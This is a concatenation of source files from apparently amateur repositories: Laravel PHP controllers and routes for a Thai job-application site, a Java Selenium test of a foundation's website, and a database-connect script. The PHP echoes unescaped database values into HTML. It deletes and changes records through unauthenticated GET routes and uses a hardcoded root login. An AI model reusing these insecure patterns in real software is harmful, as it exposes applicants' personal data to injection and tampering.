public function jobpositionindex(Request $req){
$list=$this->prov();
$listfile= DB::table('tbl_position')
->select('*')
->whereIn('status',[1,2] )
->get();
return view('backend.jobposition',compact(
'listfile',
'list'
));
}
public function deleteposition(Request $req){
$deleteposition= DB::table('tbl_position')
->where('id', $req->id)
->update(['status' => 3]);
if ($deleteposition){
$msg = " ลบข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='/jobposition';</script> ";
}else{
$msg = " ลบข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');window.location='/jobposition';</script> ";
}
echo $url_rediect;
}
public function changesposition(Request $req){
$status = $req->status;
$id = $req->id;
$date_update = date('Y-m-d');
// dd($date_update);
$updateDetails_1 = [
'status' => '2',
'date_update' => $date_update
];
$updateDetails_2 = [
'status' => '1',
'date_update' => $date_update
];
// dd($status);
if($status == "1") {
$changesposition= DB::table('tbl_position')
->where('id', $req->id)
->where('status', 1)
->update($updateDetails_1);
if ($changesposition){
$msg = " เปลี่ยนสถานะข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='/jobposition';</script> ";
}else{
$msg = " เปลี่ยนสถานะข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');window.location='/jobposition';</script> ";
}
echo $url_rediect;
}
elseif ($status == "2") {
$changesposition= DB::table('tbl_position')
->where('id', $req->id)
->where('status', 2)
->update($updateDetails_2);
if ($changesposition){
$msg = " เปลี่ยนสถานะข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='/jobposition';</script> ";
}else{
$msg = " เปลี่ยนสถานะข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');window.location='/jobposition';</script> ";
}
echo $url_rediect;
}
}
public function prov(){
$list=DB::table('tbl_provinces')
->orderBy('province_name', 'ASC')
->get();
// return view('AEFI.Apps.form1')->with('list',$list);
return $list;
}
public function fetch(Request $request){
$id=$request->get('select');
$result=array();
$query=DB::table('tbl_provinces')
->join('tbl_district','tbl_provinces.province_id','=','tbl_district.province_id')
->select('tbl_district.district_name','tbl_district.district_id','tbl_district.district_code')
->where('tbl_provinces.province_id',$id)
->get();
$output='<option value="%"> อำเภอ </option>';
foreach ($query as $row) {
$output.='<option value="'.$row->district_code.'">'.$row->district_name.'</option>';
}
echo $output;
}
public function fetchD(Request $request){
$idD = $request->select;
// dd($idD);
$resultD=array();
$queryD=DB::table('tbl_subdistricts')
->select('tbl_subdistricts.subdistrict_name','tbl_subdistricts.subdistrict_id','tbl_subdistricts.subdistrict_code')
->where(DB::raw('left(tbl_subdistricts.subdistrict_code, 4)'),'=',$idD)
->get();
$outputD='<option value="%"> ตำบล </option>';
foreach ($queryD as $rowD) {
$outputD.='<option value="'.$rowD->subdistrict_code.'">'.$rowD->subdistrict_name.'</option>';
}
echo $outputD;
}
public function jobpositionajax(Request $req){
$id = $_POST['id'];
// echo $filename;
$result=array();
$query=DB::table('tbl_position')
->select('*')
->where('id', $id )
->get();
foreach ($query as $row) {
$link='<a class="btn btn-danger" href="changesposition/id/'.$row->id.'/status/'.$row->status.'">ยืนยัน</option>';
}
echo $link;
}
public function deletejobpositionajax(Request $req){
$id = $_POST['id'];
// echo $filename;
$result=array();
$query=DB::table('tbl_position')
->select('*')
->where('id', $id )
->get();
foreach ($query as $row) {
$link='<a class="btn btn-danger" href="deleteposition/id/'.$row->id.'">ยืนยัน</option>';
}
echo $link;
}
}
<file_sep><?php
namespace App\Http\Controllers\frontend;
use Illuminate\Foundation\Bus\DispatchesJobs;
use Illuminate\Routing\Controller as BaseController;
use Illuminate\Foundation\Validation\ValidatesRequests;
use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
use Illuminate\Support\Facades\Storage;
use App\Http\Controllers\Controller;
use Illuminate\Http\Request;
use DB;
use Illuminate\Support\Str;
class AttachmentController extends Controller
{
use AuthorizesRequests, DispatchesJobs, ValidatesRequests;
public function uploadFilePost(Request $request){
$a=1;
$file= $request->file('file_name');
$path = Storage::putFile('file_upload', $file);
if($path){
$filename=$file->getClientOriginalName();
// dd($filename);
$user_id = $a;
$title_file_name = (isset($_POST['title_file_name'])) ? $_POST['title_file_name'] : '0';
$filenamegenerate=str_replace("file_upload/" ,"", $path);
$file_type=strstr($filename, ".");
$filename = $filename;
$originalfilename = $filename;
$path = $path;
$status = $a;
$date_entry = date('Y-m-d');
$date_update = date('Y-m-d');
$data = array(
'user_id' => $user_id,
'title_file_name' => $title_file_name,
'filename' => $filenamegenerate,
'file_type' => $file_type,
'originalfilename' => $originalfilename,
'path' => $path,
'status' => $status,
'date_entry' => $date_entry,
'date_update' => $date_update
);
// dd($data);
$res1 = DB::table('tbl_file_upload')->insert($data);
// dd($res1);
if ($res1){
$msg = " ส่งข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='attachment';</script> ";
}else{
$msg = " ส่งข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');</script> ";
}
echo $url_rediect;
}
}
public function attachmentindex(Request $req){
$listfile= DB::table('tbl_file_upload')
->select('*')
->where('user_id', '1' )
->where('status', '1')
->get();
return view('frontend.attachment',compact(
'listfile'
));
}
public function deletefile(Request $req){
$filename = $req->filename;
$status = $req->status;
$date_update = date('Y-m-d');
// dd($date_update);
$updateDetails_1 = [
'status' => '2',
'date_update' => $date_update
];
$deletefile= DB::table('tbl_file_upload')
->where('filename', $req->filename)
->update($updateDetails_1);
if ($deletefile){
$msg = " ลบข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='/attachment';</script> ";
}else{
$msg = " ลบข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');window.location='/attachment';</script> ";
}
echo $url_rediect;
}
public function attachmentajax(Request $req){
$filename = $_POST['filename'];
// echo $filename;
$result=array();
$query=DB::table('tbl_file_upload')
->select('*')
->where('filename', $filename )
->get();
foreach ($query as $row) {
$link='<a class="btn btn-danger" href="deletefile/filename/'.$row->filename.'/status/'.$row->status.'">ยืนยัน</a>';
}
echo $link;
}
}
<file_sep><?php
namespace App\Http\Controllers\frontend;
use Illuminate\Foundation\Bus\DispatchesJobs;
use Illuminate\Routing\Controller as BaseController;
use Illuminate\Foundation\Validation\ValidatesRequests;
use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
use App\Http\Controllers\Controller;
use Illuminate\Http\Request;
use DB;
use Illuminate\Support\Str;
class JobappliedController extends Controller
{
use AuthorizesRequests, DispatchesJobs, ValidatesRequests;
public function jobapplied(Request $req){
$listjobapplied = DB::table('tbl_select_job')
->join('tbl_position', 'tbl_select_job.position_id', '=', 'tbl_position.id')
->select('tbl_select_job.id',
'tbl_select_job.position_id',
'tbl_select_job.user_id',
'tbl_select_job.status',
'tbl_position.position_name',
'tbl_position.job_descriptions',
'tbl_position.saraly'
)
->where('tbl_select_job.status', '1')
->get();
return view('frontend.jobapplied',compact(
'listjobapplied'
));
}
public function jobapplieddelete(Request $req){
$jobapplieddelete= DB::table('tbl_select_job')
->where('id', $req->id)
->update(['status' => 2]);
if ($jobapplieddelete){
$msg = " ลบข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='/jobapplied';</script> ";
}else{
$msg = " ลบข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');window.location='/jobapplied';</script> ";
}
echo $url_rediect;
}
public function deletejobappliedajax(Request $req){
$id = $_POST['id'];
// echo $id;
// exit;
$result=array();
$query=DB::table('tbl_position')
->select('*')
->where('id', $id )
->get();
// echo $query;
// exit;
foreach ($query as $row) {
$link='<a class="btn btn-danger" href="jobapplieddelete/id/'.$row->id.'">ยืนยัน</option>';
}
echo $link;
}
}
<file_sep><?php
namespace App\Http\Controllers\apps;
use Illuminate\Foundation\Bus\DispatchesJobs;
use Illuminate\Routing\Controller as BaseController;
use Illuminate\Foundation\Validation\ValidatesRequests;
use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
use Illuminate\Support\Facades\Storage;
use App\Http\Controllers\Controller;
use Illuminate\Http\Request;
use DB;
use Illuminate\Support\Str;
class testController extends Controller
{
use AuthorizesRequests, DispatchesJobs, ValidatesRequests;
public function test(Request $req){
$listfile= DB::table('tbl_file_upload')
->select('*')
->where('user_id', '1' )
->where('status', '1')
->get();
return view('apps.test',compact(
'listfile'
));
}
public function testajax(Request $req){
$id = $_POST['id'];
echo $id;
}
}
<file_sep><?php
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
Route::get('/', 'frontend\JobavailableController@jobavailableindex')->name('/');
Route::post('/jobavailableajax', 'frontend\JobavailableController@jobavailableajax')->name('/jobavailableajax');
Route::get('insertjobavailable/user_id/{user_id}/position_id/{position_id}/status/{status}', 'frontend\JobavailableController@insertjobavailable')->name('insertjobavailable');
// function insert tbl_resume
Route::get('/resume', 'frontend\ResumeController@resumeindex')->name('resume');
Route::post('/insertdataresume', 'frontend\ResumeController@insertresume')->name('insertdataresume');
Route::post('/resume/fetch', 'frontend\ResumeController@fetch')->name('dropdown.fetch');
Route::post('/resume/fetchD', 'frontend\ResumeController@fetchD')->name('dropdown.fetchD');
// attachment
Route::get('/attachment', 'frontend\AttachmentController@attachmentindex')->name('attachment');
Route::post('/attachment/attachmentajax', 'frontend\AttachmentController@attachmentajax')->name('/attachment/attachmentajax');
Route::post('/uploadfile', 'frontend\AttachmentController@uploadFilePost')->name('uploadfile');
Route::get('/deletefile/filename/{filename}/status/{status}', 'frontend\AttachmentController@deletefile')->name('deletefile');
// Jobapplied
Route::get('/jobapplied', 'frontend\JobappliedController@jobapplied')->name('jobapplied');
Route::post('jobapplied/deletejobappliedajax', 'frontend\JobappliedController@deletejobappliedajax')->name('jobapplied/deletejobappliedajax');
Route::get('/jobapplieddelete/id/{id}', 'frontend\JobappliedController@jobapplieddelete')->name('jobapplieddelete');
// backend session
// addjobposition
Route::get('addjobposition/user_id/{user_id}', 'backend\AddjobpositionController@addjobpositionindex')->name('addjobposition');
// Route::get('addjobposition/user_id/{user_id}', function ($user_id) {
// return 'addjobposition '.$user_id;
// });
Route::post('/insertposition', 'backend\AddjobpositionController@insertposition')->name('insertposition');
Route::get('/jobposition', 'backend\AddjobpositionController@jobpositionindex')->name('jobposition');
Route::post('/jobposition/jobpositionajax', 'backend\AddjobpositionController@jobpositionajax')->name('jobposition/jobpositionajax');
Route::post('/jobposition/deletejobpositionajax', 'backend\AddjobpositionController@deletejobpositionajax')->name('jobposition/deletejobpositionajax');
Route::get('/deleteposition/id/{id}', 'backend\AddjobpositionController@deleteposition')->name('deleteposition');
Route::get('/changesposition/id/{id}/status/{status}', 'backend\AddjobpositionController@changesposition')->name('changesposition');
Auth::routes();
Route::get('/home', 'HomeController@index')->name('home');
<file_sep><?php
namespace App\Http\Controllers\frontend;
use Illuminate\Foundation\Bus\DispatchesJobs;
use Illuminate\Routing\Controller as BaseController;
use Illuminate\Foundation\Validation\ValidatesRequests;
use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
use App\Http\Controllers\Controller;
use Illuminate\Http\Request;
use DB;
use Illuminate\Support\Str;
class JobavailableController extends Controller
{
/**
* Create a new controller instance.
*
* @return void
*/
public function __construct()
{
$this->middleware('auth');
}
/**
* Show the application dashboard.
*
* @return \Illuminate\Contracts\Support\Renderable
*/
public function insertjobavailable(Request $req)
{
$user_id = $req->user_id;
// dd($user_id);
$position_id = $req->position_id;
$status = $req->status;
$date_entry = date('Y-m-d');
$date_update = date('Y-m-d');
$data = array(
'user_id' => $user_id,
'position_id' => $position_id,
'status' => $status,
'date_entry' => $date_entry,
'date_update' => $date_update
);
// dd($data);
$res1 = DB::table('tbl_select_job')->insert($data);
// dd($res1);
if ($res1){
$msg = " ส่งข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='/#job-available-section';</script> ";
}else{
$msg = " ส่งข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');</script> ";
}
echo $url_rediect;
}
public function jobavailableindex(Request $req){
auth()->user()->assignRole('user');
$list=$this->prov();
$jobavailabledata = DB::select('select * FROM tbl_position WHERE status = "1"' );
$listfile= DB::table('tbl_position')
->select('*')
->whereIn('status',[1] )
->get();
return view('frontend.index',compact(
'jobavailabledata',
'listfile',
'list'
));
}
public function prov(){
$list=DB::table('tbl_provinces')
->orderBy('province_name', 'ASC')
->get();
// return view('AEFI.frontend.form1')->with('list',$list);
return $list;
}
public function fetch(Request $request){
$id=$request->get('select');
$result=array();
$query=DB::table('tbl_provinces')
->join('tbl_district','tbl_provinces.province_id','=','tbl_district.province_id')
->select('tbl_district.district_name','tbl_district.district_id','tbl_district.district_code')
->where('tbl_provinces.province_id',$id)
->get();
$output='<option value="%"> อำเภอ </option>';
foreach ($query as $row) {
$output.='<option value="'.$row->district_code.'">'.$row->district_name.'</option>';
}
echo $output;
}
public function fetchD(Request $request){
$idD = $request->select;
// dd($idD);
$resultD=array();
$queryD=DB::table('tbl_subdistricts')
->select('tbl_subdistricts.subdistrict_name','tbl_subdistricts.subdistrict_id','tbl_subdistricts.subdistrict_code')
->where(DB::raw('left(tbl_subdistricts.subdistrict_code, 4)'),'=',$idD)
->get();
$outputD='<option value="%"> ตำบล </option>';
foreach ($queryD as $rowD) {
$outputD.='<option value="'.$rowD->subdistrict_code.'">'.$rowD->subdistrict_name.'</option>';
}
echo $outputD;
}
public function jobavailableajax(Request $req){
$id = $_POST['id'];
// echo $filename;
$result=array();
$query=DB::table('tbl_position')
->select('*')
->where('id', $id )
->get();
foreach ($query as $row) {
$link='<p class="lead">Job Descriptions :</p>
<p class="text-muted mb-4">'
.$row->job_descriptions.
'</p>
<p class="lead">Education :</p>
<p class="text-muted mb-4">'
.$row->education.
'</p>
<p class="lead">Experiences :</p>
<p class="text-muted mb-4">'
.$row->experiences.
'</p>
<p class="lead">Attributes :</p>
<p class="text-muted mb-4">'
.$row->attributes.
'</p>
<p class="lead">Gender :</p>
<p class="text-muted mb-4">'
.$row->gender.
'</p>
<p class="lead">Age :</p>
<p class="text-muted mb-4">'
.$row->age.
'</p>
<p class="lead">Saraly :</p>
<p class="text-muted mb-4">'
.$row->saraly.
'</p>
<p class="lead">Job Post Date :</p>
<p class="text-muted mb-4">'
.$row->job_post_date.
'</p>
<div class="modal-footer">
<a class="btn btn-danger" href="insertjobavailable/user_id/'.$row->id.'/position_id/'.$row->id.'/status/'.$row->status.'">ยืนยัน</a>
<button type="button" class="btn btn-primary" data-dismiss="modal">Close</button>
</div>';
}
echo $link;
}
}
<file_sep><?php
namespace App\Http\Controllers\frontend;
use Illuminate\Foundation\Bus\DispatchesJobs;
use Illuminate\Routing\Controller as BaseController;
use Illuminate\Foundation\Validation\ValidatesRequests;
use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
use App\Http\Controllers\Controller;
use Illuminate\Http\Request;
use DB;
use Illuminate\Support\Str;
class ResumeController extends Controller
{
use AuthorizesRequests, DispatchesJobs, ValidatesRequests;
public function insertresume(Request $req)
{
$user_id = (isset($_POST['user_id'])) ? $_POST['user_id'] : '0';
$year_of_applied = (isset($_POST['year_of_applied'])) ? $_POST['year_of_applied'] : '0';
$date_of_applied = (isset($_POST['date_of_applied'])) ? $_POST['date_of_applied'] : '0';
$number_of_applied = (isset($_POST['number_of_applied'])) ? $_POST['number_of_applied'] : '0';
$position_of_applied = (isset($_POST['position_of_applied'])) ? $_POST['position_of_applied'] : '0';
$applied_announcement = (isset($_POST['applied_announcement'])) ? $_POST['applied_announcement'] : '0';
$title_name = (isset($_POST['title_name'])) ? $_POST['title_name'] : '0';
$first_name_th = (isset($_POST['first_name_th'])) ? $_POST['first_name_th'] : '0';
$last_name_th = (isset($_POST['last_name_th'])) ? $_POST['last_name_th'] : '0';
$first_name_en = (isset($_POST['first_name_en'])) ? $_POST['first_name_en'] : '0';
$last_name_en = (isset($_POST['last_name_en'])) ? $_POST['last_name_en'] : '0';
$gendar = (isset($_POST['gendar'])) ? $_POST['gendar'] : '0';
$date_birth = (isset($_POST['date_birth'])) ? $_POST['date_birth'] : '0';
$province_birth = (isset($_POST['province_birth'])) ? $_POST['province_birth'] : '0';
$district_birth = (isset($_POST['district_birth'])) ? $_POST['district_birth'] : '0';
$subdistrict_birth = (isset($_POST['subdistrict_birth'])) ? $_POST['subdistrict_birth'] : '0';
$nationality = (isset($_POST['nationality'])) ? $_POST['nationality'] : '0';
$religion = (isset($_POST['religion'])) ? $_POST['religion'] : '0';
$military_service = (isset($_POST['military_service'])) ? $_POST['military_service'] : '0';
$blood_type = (isset($_POST['blood_type'])) ? $_POST['blood_type'] : '0';
$congenital_disease = (isset($_POST['congenital_disease'])) ? $_POST['congenital_disease'] : '0';
$congenital_disease_text = (isset($_POST['congenital_disease_text'])) ? $_POST['congenital_disease_text'] : '0';
$id_card_number = (isset($_POST['id_card_number'])) ? $_POST['id_card_number'] : '0';
$id_card_expiration_date = (isset($_POST['id_card_expiration_date'])) ? $_POST['id_card_expiration_date'] : '0';
$id_card_issue_date = (isset($_POST['id_card_issue_date'])) ? $_POST['id_card_issue_date'] : '0';
$province_id_card_issue = (isset($_POST['province_id_card_issue'])) ? $_POST['province_id_card_issue'] : '0';
$location_id_card_issue = (isset($_POST['location_id_card_issue'])) ? $_POST['location_id_card_issue'] : '0';
$passport_no = (isset($_POST['passport_no'])) ? $_POST['passport_no'] : '0';
$passport_expired_date = (isset($_POST['passport_expired_date'])) ? $_POST['passport_expired_date'] : '0';
$passport_issued_date = (isset($_POST['passport_issued_date'])) ? $_POST['passport_issued_date'] : '0';
$visa_no = (isset($_POST['visa_no'])) ? $_POST['visa_no'] : '0';
$type_of_visa = (isset($_POST['type_of_visa'])) ? $_POST['type_of_visa'] : '0';
$visa_issue_date = (isset($_POST['visa_issued_date'])) ? $_POST['visa_issued_date'] : '0';
$visa_expired_date = (isset($_POST['visa_expired_date'])) ? $_POST['visa_expired_date'] : '0';
$work_permit_no = (isset($_POST['work_permit_no'])) ? $_POST['work_permit_no'] : '0';
$work_permit_expired_date = (isset($_POST['work_permit_expired_date'])) ? $_POST['work_permit_expired_date'] : '0';
$work_permit_issue_date = (isset($_POST['work_permit_issue_date'])) ? $_POST['work_permit_issue_date'] : '0';
$marital_status = (isset($_POST['marital_status'])) ? $_POST['marital_status'] : '0';
$spouse_first_name = (isset($_POST['spouse_first_name'])) ? $_POST['spouse_first_name'] : '0';
$spouse_last_name = (isset($_POST['spouse_last_name'])) ? $_POST['spouse_last_name'] : '0';
$spouse_career = (isset($_POST['spouse_career'])) ? $_POST['spouse_career'] : '0';
$spouse_career_location = (isset($_POST['spouse_career_location'])) ? $_POST['spouse_career_location'] : '0';
$number_of_children = (isset($_POST['number_of_children'])) ? $_POST['number_of_children'] : '0';
$writing = (isset($_POST['writing'])) ? $_POST['writing'] : '0';
$ability_level = (isset($_POST['ability_level'])) ? $_POST['ability_level'] : '0';
$local_language = (isset($_POST['local_language'])) ? $_POST['local_language'] : '0';
$computer_knowledge = (isset($_POST['computer_knowledge'])) ? $_POST['computer_knowledge'] : '0';
$programs_be_used = (isset($_POST['programs_be_used'])) ? $_POST['programs_be_used'] : '0';
$other_special_abilities = (isset($_POST['other_special_abilities'])) ? $_POST['other_special_abilities'] : '0';
$hobbies = (isset($_POST['hobbies'])) ? $_POST['hobbies'] : '0';
$toefl_paper = (isset($_POST['toefl_paper'])) ? $_POST['toefl_paper'] : '0';
$toefl_cbt = (isset($_POST['toefl_cbt'])) ? $_POST['toefl_cbt'] : '0';
$toefl_cbt_compare_score = (isset($_POST['toefl_cbt_compare_score'])) ? $_POST['toefl_cbt_compare_score'] : '0';
$toefl_ibt = (isset($_POST['toefl_ibt'])) ? $_POST['toefl_ibt'] : '0';
$ielts = (isset($_POST['ielts'])) ? $_POST['ielts'] : '0';
$ielts_compare_score = (isset($_POST['ielts_compare_score'])) ? $_POST['ielts_compare_score'] : '0';
$cu_tep = (isset($_POST['cu_tep'])) ? $_POST['cu_tep'] : '0';
$career = (isset($_POST['career'])) ? $_POST['career'] : '0';
$position = (isset($_POST['position'])) ? $_POST['position'] : '0';
$affiliation = (isset($_POST['affiliation'])) ? $_POST['affiliation'] : '0';
$career_start_date = (isset($_POST['career_start_date'])) ? $_POST['career_start_date'] : '0';
$career_ended_date = (isset($_POST['career_ended_date'])) ? $_POST['career_ended_date'] : '0';
$salary = (isset($_POST['salary'])) ? $_POST['salary'] : '0';
$date_entry = date('Y-m-d');
$data = array(
'user_id' => $user_id,
'year_of_applied' => $year_of_applied,
'date_of_applied' => $date_of_applied,
'number_of_applied' => $number_of_applied,
'position_of_applied' => $position_of_applied,
'applied_announcement' => $applied_announcement,
'title_name' => $title_name,
'first_name_th' => $first_name_th,
'last_name_th' => $last_name_th,
'first_name_en' => $first_name_en,
'last_name_en' => $last_name_en,
'gendar' => $gendar,
'date_birth' => $date_birth,
'province_birth' => $province_birth,
'district_birth' => $district_birth,
'subdistrict_birth' => $subdistrict_birth,
'nationality' => $nationality,
'religion' => $religion,
'military_service' => $military_service,
'blood_type' => $blood_type,
'congenital_disease' => $congenital_disease,
'congenital_disease_text' => $congenital_disease_text,
'id_card_number' => $id_card_number,
'id_card_expiration_date' => $id_card_expiration_date,
'id_card_issue_date' => $id_card_issue_date,
'province_id_card_issue' => $province_id_card_issue,
'location_id_card_issue' => $location_id_card_issue,
'passport_no' => $passport_no,
'passport_expired_date' => $passport_expired_date,
'passport_issued_date' => $passport_issued_date,
'visa_no' => $visa_no,
'type_of_visa' => $type_of_visa,
'visa_issue_date' => $visa_issue_date,
'visa_expired_date' => $visa_expired_date,
'work_permit_no' => $work_permit_no,
'work_permit_expired_date' => $work_permit_expired_date,
'work_permit_issue_date' => $work_permit_issue_date,
'marital_status' => $marital_status,
'spouse_first_name' => $spouse_first_name,
'spouse_last_name' => $spouse_last_name,
'spouse_career' => $spouse_career,
'spouse_career_location' => $spouse_career_location,
'number_of_children' => $number_of_children,
'writing' => $writing,
'ability_level' => $ability_level,
'local_language' => $local_language,
'computer_knowledge' => $computer_knowledge,
'programs_be_used' => $programs_be_used,
'other_special_abilities' => $other_special_abilities,
'hobbies' => $hobbies,
'toefl_paper' => $toefl_paper,
'toefl_cbt' => $toefl_cbt,
'toefl_cbt_compare_score' => $toefl_cbt_compare_score,
'toefl_ibt' => $toefl_ibt,
'ielts' => $ielts,
'ielts_compare_score' => $ielts_compare_score,
'cu_tep' => $cu_tep,
'career' => $career,
'position' => $position,
'affiliation' => $affiliation,
'career_start_date' => $career_start_date,
'career_ended_date' => $career_ended_date,
'salary' => $salary,
'date_entry' => $date_entry
);
// dd($data);
$res1 = DB::table('tbl_resume')->insert($data);
// dd($res1);
if ($res1){
$msg = " ส่งข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='jobapplied';</script> ";
}else{
$msg = " ส่งข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');</script> ";
}
echo $url_rediect;
}
public function resumeindex(Request $req){
$list=$this->prov();
return view('frontend.resume',compact(
'list'
));
}
public function prov(){
$list=DB::table('tbl_provinces')
->orderBy('province_name', 'ASC')
->get();
// return view('AEFI.frontend.form1')->with('list',$list);
return $list;
}
public function fetch(Request $request){
$id=$request->get('select');
$result=array();
$query=DB::table('tbl_provinces')
->join('tbl_district','tbl_provinces.province_id','=','tbl_district.province_id')
->select('tbl_district.district_name','tbl_district.district_id','tbl_district.district_code')
->where('tbl_provinces.province_id',$id)
->get();
$output='<option value="%"> อำเภอ </option>';
foreach ($query as $row) {
$output.='<option value="'.$row->district_code.'">'.$row->district_name.'</option>';
}
echo $output;
}
public function fetchD(Request $request){
$idD = $request->select;
// dd($idD);
$resultD=array();
$queryD=DB::table('tbl_subdistricts')
->select('tbl_subdistricts.subdistrict_name','tbl_subdistricts.subdistrict_id','tbl_subdistricts.subdistrict_code')
->where(DB::raw('left(tbl_subdistricts.subdistrict_code, 4)'),'=',$idD)
->get();
$outputD='<option value="%"> ตำบล </option>';
foreach ($queryD as $rowD) {
$outputD.='<option value="'.$rowD->subdistrict_code.'">'.$rowD->subdistrict_name.'</option>';
}
echo $outputD;
}
}
|
1f63320bd67b02b3c6baf9f1a5e65228baa2572d
|
[
"PHP"
] | 7
|
PHP
|
aungdex13/gistda-career
|
3a111e432cfbcc95d53d97bb2b07653e086c7040
|
c9151cab27bd9b47a328a21d44d94a731d113ebe
|
refs/heads/main
|
<file_sep># Testing-using-selenium<file_sep>package test1;
//import junit.framework.Assert;
import org.openqa.selenium.By;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.WebElement;
import org.openqa.selenium.chrome.ChromeDriver;
import org.testng.Assert;
import org.testng.annotations.BeforeTest;
public class NewTest {
@BeforeTest
public void beforeTest()throws Throwable {
System.setProperty("webdriver.chrome.driver","C:\\Users\\hp\\chromedriver.exe");
WebDriver driver=new ChromeDriver();
driver.get("https://www.thesparksfoundationsingapore.org/");
driver.manage().window().maximize();
WebElement logo=driver.findElement(By.xpath("//*[@id=\"home\"]/div/div[1]/h1/a/img"));
Assert.assertTrue(logo.isDisplayed());
String title=driver.getTitle();
System.out.println(title);
Assert.assertEquals("The Sparks Foundation | Home", title);
WebElement contact=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[6]/a"));
contact.click();
Thread.sleep(3000);
String header=driver.findElement(By.xpath("//*[@id=\"home\"]/div/div[2]/h2")).getText();
Assert.assertEquals("Contact Us", header);
WebElement joinus=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[5]/a"));
joinus.click();
Thread.sleep(3000);
WebElement why=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[5]/ul/li[1]/a"));
why.click();
Thread.sleep(3000);
String span=driver.findElement(By.xpath("/html/body/div[2]/div/div[1]/div/div[3]/h3/span")).getText();
Assert.assertEquals("Be Your Own Boss", span);
WebElement links=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[4]/a"));
links.click();
Thread.sleep(3000);
WebElement AI=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[4]/ul/li[3]/a"));
AI.click();
Thread.sleep(3000);
WebElement nextlink=driver.findElement(By.xpath("/html/body/div[2]/div/div[1]/div/div[1]/div/div/div[2]/div/a"));
nextlink.click();
Thread.sleep(3000);
String MainWindow1=driver.getWindowHandle();
// String link5=driver.findElement(By.xpath("/html/head/title")).getText();
// Assert.assertEquals("Can AI fix education? We asked <NAME> - The Verge", link5);
driver.switchTo().window(MainWindow1);
WebElement program=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[3]/a"));
program.click();
Thread.sleep(3000);
WebElement workshop=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[3]/ul/li[4]/a"));
workshop.click();
Thread.sleep(3000);
WebElement student=driver.findElement(By.xpath("/html/body/div[2]/div/div[2]/div/ul/li[1]/a"));
student.click();
Thread.sleep(3000);
String studentscholar=driver.findElement(By.xpath("//*[@id=\"home\"]/div/div[2]/h2")).getText();
Assert.assertEquals("Student Scholarship Program",studentscholar );
WebElement ClickOnAboutUsPage = driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[1]/a"));
ClickOnAboutUsPage.click();
Thread.sleep(3000);
WebElement ClickOnExeutiveAboutUsDropdown = driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[1]/ul/li[4]/a"));
ClickOnExeutiveAboutUsDropdown.click();
Thread.sleep(3000);
String ExecutiveTeamHeader = driver.findElement(By.xpath("//*[@id=\"home\"]/div/div[2]/h2")).getText();
Assert.assertEquals("Executive Team", ExecutiveTeamHeader);
String FounderName = driver.findElement(By.xpath("/html/body/div[2]/div/div[1]/div/div[1]/div/h4")).getText();
Assert.assertEquals("<NAME>", FounderName);
WebElement FounderDescription = driver.findElement(By.xpath("/html/body/div[2]/div/div[1]/div/div[1]/div/p"));
Assert.assertTrue(FounderDescription.isDisplayed());
WebElement FounderPicture = driver.findElement(By.xpath("/html/body/div[2]/div/div[1]/div/div[1]/a/img"));
if(FounderPicture.isDisplayed())
{
FounderPicture.click();
Thread.sleep(3000);
String title1 = driver.getTitle();
String MainWindow2=driver.getWindowHandle();
driver.switchTo().window(MainWindow2);
// Assert.assertEquals(false, false)
System.out.println(title1);
}
else
{
System.out.println("Founder Picture not dislayed");
}
WebElement policy=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[2]/a"));
policy.click();
Thread.sleep(3000);
WebElement ethics=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[2]/ul/li[2]/a\n"));
ethics.click();
Thread.sleep(3000);
WebElement homepage=driver.findElement(By.xpath("//*[@id=\"home\"]/div/div[1]/h1/a"));
homepage.click();
driver.close();
}
}
|
648277a7dda7ab268df6b101751d8c28d7d2678f
|
[
"Markdown",
"Java"
] | 2
|
Markdown
|
riyachugh2327/Testing-using-selenium
|
0b67472ea39e21b4b5500eddf12460438d646df8
|
41e71ede7d27ab86ee53bc0b4e22eb8819d7b897
|
refs/heads/master
|
<repo_name>keswara/sb<file_sep>/connect.php
<?php
define('HOST','chaiae.me');
define('USER','root');
define('PASS','<PASSWORD>');
define('DATABASE','sbfram');
$con = mysqli_connect(HOST,USER,PASS,DATABASE);
if(mysqli_connect_errno()){
die("Unable to connect to the database. error: " . mysqli_connect_error());
}
else{
mysqli_set_charset($con, "utf8");
}
?><file_sep>/get_post.php
<?php
header("content-type:text/javascript;charset=utf-8");
define('HOST','chaiae.me');
define('USER','root');
